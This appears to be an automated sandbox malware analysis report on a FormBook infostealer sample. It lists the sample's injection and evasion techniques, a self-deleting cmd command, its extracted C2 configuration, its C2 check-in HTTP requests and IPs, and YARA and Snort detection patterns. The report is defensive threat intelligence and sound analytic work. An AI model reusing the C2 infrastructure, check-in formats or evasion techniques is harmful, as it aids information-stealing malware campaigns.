Windows Analysis Report TT COPY_02101011.exe

Overview

General Information

Sample Name: TT COPY_02101011.exe
Analysis ID: 528714
MD5: ebabc0d66a9e01cc0926f3b311feff5f
SHA1: 83a44664135a7255045becde754dae29be496c8f
SHA256: ea8733d0ea6248e2f522487d09e7854230a648e67f1a5e90fea31f6305a1ff7b
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • TT COPY_02101011.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\TT COPY_02101011.exe" MD5: EBABC0D66A9E01CC0926F3B311FEFF5F)
    • TT COPY_02101011.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\TT COPY_02101011.exe" MD5: EBABC0D66A9E01CC0926F3B311FEFF5F)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 6712 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • NETSTAT.EXE (PID: 744 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 7080 cmdline: /c del "C:\Users\user\Desktop\TT COPY_02101011.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.helpfromjames.com/e8ia/"], "decoy": ["le-hameau-enchanteur.com", "quantumsystem-au.club", "engravedeeply.com", "yesrecompensas.lat", "cavallitowerofficials.com", "800seaspray.com", "skifun-jetski.com", "thouartafoot.com", "nft2dollar.com", "petrestore.online", "cjcutthecord2.com", "tippimccullough.com", "gadget198.xyz", "djmiriam.com", "bitbasepay.com", "cukierniawz.com", "mcclureic.xyz", "inthekitchenshakinandbakin.com", "busy-clicks.com", "melaniemorris.online", "elysiangp.com", "7bkj.com", "wakeanddraw.com", "ascalar.com", "iteraxon.com", "henleygirlscricket.com", "torresflooringdecorllc.com", "helgquieta.quest", "xesteem.com", "graffity-aws.com", "bolerparts.com", "andriylysenko.com", "bestinvest-4-you.com", "frelsicycling.com", "airductcleaningindianapolis.net", "nlproperties.net", "alkoora.xyz", "sakiyaman.com", "wwwsmyrnaschooldistrict.com", "unitedsafetyassociation.com", "fiveallianceapparel.com", "edgelordkids.com", "herhauling.com", "intelldat.com", "weprepareamerica-planet.com", "webartsolution.net", "yiquge.com", "marraasociados.com", "dentalimplantnearyou-ca.space", "linemanbible.com", "dunamisdispatchservicellc.com", "latamoperationalinstitute.com", "stpaulsschoolbagidora.com", "groupninemed.com", "solar-tribe.com", "footairdz.com", "blttsperma.quest", "xfeuio.xyz", "sahodyafbdchapter.com", "0934800.com", "dandftrading.com", "gladway.net", "mineriasinmercurio.com", "inaampm.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      1.1.TT COPY_02101011.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        1.1.TT COPY_02101011.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.TT COPY_02101011.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        1.0.TT COPY_02101011.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          1.0.TT COPY_02101011.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: TT COPY_02101011.exe, Virustotal: Detection: 36%
          Source: TT COPY_02101011.exe, ReversingLabs: Detection: 15%
          Yara detected FormBook
          Source: Yara match, File source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll, ReversingLabs: Detection: 15%
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll, Joe Sandbox ML: detected
          Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.TT COPY_02101011.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen2
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.NETSTAT.EXE.372796c.4.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.NETSTAT.EXE.d6e840.0.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: TT COPY_02101011.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: TT COPY_02101011.exe, 00000000.00000003.677689499.0000000002A70000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000000.00000003.677942746.0000000002C00000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TT COPY_02101011.exe, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405250
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 0_2_00405C22 FindFirstFileA,FindClose,0_2_00405C22
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 0_2_00402630 FindFirstFileA,0_2_00402630

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49824 -> 143.95.80.65:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49824 -> 143.95.80.65:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49824 -> 143.95.80.65:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49850 -> 104.21.31.204:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49850 -> 104.21.31.204:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49850 -> 104.21.31.204:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Network Connect: 37.123.118.150 80
          Source: C:\Windows\explorer.exe, Network Connect: 213.186.33.5 80
          Source: C:\Windows\explorer.exe, Domain query: www.webartsolution.net
          Source: C:\Windows\explorer.exe, Network Connect: 185.65.236.168 80
          Source: C:\Windows\explorer.exe, Domain query: www.mcclureic.xyz
          Source: C:\Windows\explorer.exe, Domain query: www.gadget198.xyz
          Source: C:\Windows\explorer.exe, Domain query: www.intelldat.com
          Source: C:\Windows\explorer.exe, Network Connect: 3.96.23.237 80
          Source: C:\Windows\explorer.exe, Domain query: www.helpfromjames.com
          Source: C:\Windows\explorer.exe, Network Connect: 172.67.158.42 80
          Source: C:\Windows\explorer.exe, Domain query: www.le-hameau-enchanteur.com
          Source: C:\Windows\explorer.exe, Domain query: www.blttsperma.quest
          Source: C:\Windows\explorer.exe, Network Connect: 198.54.125.56 80
          Source: C:\Windows\explorer.exe, Network Connect: 151.139.128.11 80
          Source: C:\Windows\explorer.exe, Domain query: www.yesrecompensas.lat
          Source: C:\Windows\explorer.exe, Domain query: www.henleygirlscricket.com
          Source: C:\Windows\explorer.exe, Network Connect: 143.95.80.65 80
          Uses netstat to query active network connections and open ports
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exe, DNS query: www.mcclureic.xyz
          Source: C:\Windows\explorer.exe, DNS query: www.gadget198.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.helpfromjames.com/e8ia/
          Source: Joe Sandbox View, ASN Name: UK2NET-ASGB UK2NET-ASGB
          Source: global traffic, HTTP traffic detected: GET /e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz HTTP/1.1; Host: www.yesrecompensas.lat; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz HTTP/1.1; Host: www.gadget198.xyz; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz HTTP/1.1; Host: www.le-hameau-enchanteur.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /e8ia/?iXg8nxg=Y16Z63O1gty4jexpGTflGuIz4Gugt4GYAlGZJQf+kV2UdFWHFdKuPaLe5BRm7+ulCaVU&xTh4=5jvdevo8uz HTTP/1.1; Host: www.henleygirlscricket.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz HTTP/1.1; Host: www.webartsolution.net; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz HTTP/1.1; Host: www.blttsperma.quest; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz HTTP/1.1; Host: www.intelldat.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: Joe Sandbox View, IP Address: 37.123.118.150 37.123.118.150
          Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: nginx/1.10.3 (Ubuntu); Date: Thu, 25 Nov 2021 16:50:07 GMT; Content-Type: text/html; Content-Length: 178; Connection: close; Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>
          Source: TT COPY_02101011.exe, String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: TT COPY_02101011.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: unknown, DNS traffic detected: queries for: www.mcclureic.xyz
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe, Code function: 0_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404E07

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
